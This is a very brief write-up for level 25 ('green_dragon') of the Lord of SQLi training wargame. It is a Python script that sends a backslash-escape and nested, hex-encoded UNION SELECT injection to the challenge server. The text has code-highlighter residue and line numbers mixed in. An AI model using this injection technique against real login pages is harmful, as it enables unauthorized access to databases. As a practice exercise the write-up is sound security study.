LOS :: 25번 GREEN_DRAGON
WRITE UP 12345678910import requests url = "http://los.rubiya.kr/green_dragon_74d944f888fd3f9cf76e4e230e78c45b.php"session = {'PHPSESSID':'MY_SESSION'}data = {'id':"\\", 'pw':" union select 0x5c,0x20756E696F6E2073656C6563742030783631363436443639364523#"} res = requests.get(url, params=data, cookies = session) if "Clear!" in res.text: print("[♪] GREEN_DRAGON Clear!")Colored by Color Scriptercs